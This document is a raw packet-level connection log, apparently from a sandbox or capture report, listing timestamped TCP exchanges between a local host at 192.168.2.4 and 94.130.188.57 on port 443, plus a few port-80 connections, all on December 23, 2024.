                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770829916 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770832062 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770838976 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770855904 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770867109 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770922899 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770936966 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770994902 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.771007061 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.771014929 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.771018982 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.785990000 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.786077023 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.786521912 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.786564112 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788058996 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788085938 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788153887 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788178921 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788191080 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788211107 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788288116 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788322926 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788337946 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788351059 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788403034 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:44.788422108 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.736260891 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.736356020 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.736367941 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.736711025 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.737253904 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:45.737276077 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.244767904 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.244874001 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.245018005 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.245018959 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.245750904 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.245796919 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533323050 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533381939 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533503056 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533849001 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:46.533865929 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.536930084 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.537029982 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.537478924 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.537478924 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.537558079 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.936737061 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.936836958 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.937311888 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.937323093 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939611912 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939615965 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939701080 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939717054 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939723015 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939727068 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939821959 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939845085 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.939975977 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940289974 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940417051 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940429926 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940442085 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940448046 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940459967 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940493107 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:47.940504074 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.060738087 CET4973680192.168.2.4192.229.221.95
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.060821056 CET4973180192.168.2.418.66.161.122
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.060868979 CET4973380192.168.2.413.227.8.41
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.181993008 CET8049736192.229.221.95192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182051897 CET4973680192.168.2.4192.229.221.95
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182074070 CET804973118.66.161.122192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182089090 CET804973313.227.8.41192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182123899 CET4973180192.168.2.418.66.161.122
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.182157993 CET4973380192.168.2.413.227.8.41
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.940695047 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.940799952 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.941268921 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.941302061 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.942905903 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:48.942923069 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.705657959 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.705811977 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.705874920 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.705910921 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.705946922 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.705977917 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.706830025 CET49770443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.706861973 CET4434977094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.991847992 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.991925001 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.991955996 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.991974115 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.992006063 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.992031097 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.993067026 CET49771443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:49.993084908 CET4434977194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:50.594820023 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:50.594858885 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:50.594952106 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:50.595202923 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:50.595213890 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:51.625334978 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:51.625385046 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:51.625473022 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:51.625709057 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:51.625724077 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.023830891 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.023914099 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.024405003 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.024415016 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026087046 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026092052 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026139021 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026151896 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026245117 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026261091 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026470900 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026582956 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026736021 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026761055 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026906013 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026923895 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026947021 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:52.026969910 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.029479027 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.029686928 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.030071020 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.030088902 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031649113 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031667948 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031716108 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031732082 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031744003 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031754971 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031800032 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031827927 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031851053 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031862020 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031935930 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.031955957 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.857661963 CET4973480192.168.2.4192.229.221.95
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.857691050 CET4973880192.168.2.418.66.161.122
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.857736111 CET4972380192.168.2.423.32.238.179
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.857801914 CET4972480192.168.2.423.32.238.179
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.861690998 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.861896992 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.861984968 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.867805958 CET49772443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.867835045 CET4434977294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.977530956 CET804973818.66.161.122192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.977608919 CET4973880192.168.2.418.66.161.122
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.978151083 CET8049734192.229.221.95192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.978214979 CET4973480192.168.2.4192.229.221.95
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.978220940 CET804972323.32.238.179192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.978255033 CET804972423.32.238.179192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.978281975 CET4972380192.168.2.423.32.238.179
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:53.978311062 CET4972480192.168.2.423.32.238.179
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.551673889 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.551753998 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.551780939 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.551800013 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.551827908 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.551857948 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.553767920 CET49773443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.553781986 CET4434977394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.718152046 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.718187094 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.718370914 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.718895912 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:54.718910933 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:55.740386009 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:55.740456104 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:55.740521908 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:55.740819931 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:55.740837097 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.122838020 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.122920036 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.123347998 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.123356104 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.124897957 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.124903917 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.124970913 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.124979019 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125030041 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125037909 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125082016 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125099897 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125138998 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125149965 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125212908 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125226021 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125267029 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125313044 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125341892 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125374079 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125499010 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125520945 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125536919 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:56.125559092 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.146050930 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.148794889 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.149151087 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.149175882 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.150513887 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.150526047 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.150578022 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.150599003 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.154381990 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.154412985 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.154860020 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.154896975 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160537958 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160566092 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160634041 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160649061 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160751104 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160773039 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160803080 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160818100 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160850048 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160866022 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160918951 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.160936117 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161019087 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161045074 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161083937 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161118031 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161154985 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161173105 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161206961 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161221981 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161299944 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161334991 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161360025 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.161371946 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.943996906 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944068909 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944087982 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944137096 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944188118 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944242954 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944911957 CET49775443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:57.944922924 CET4434977594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.767847061 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.767910004 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.767991066 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.768249989 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:58.768273115 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304259062 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304332972 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304358959 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304394007 CET4434977694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304405928 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.304441929 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.309998035 CET49776443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:59.310024023 CET4434977694.130.188.57192.168.2.4
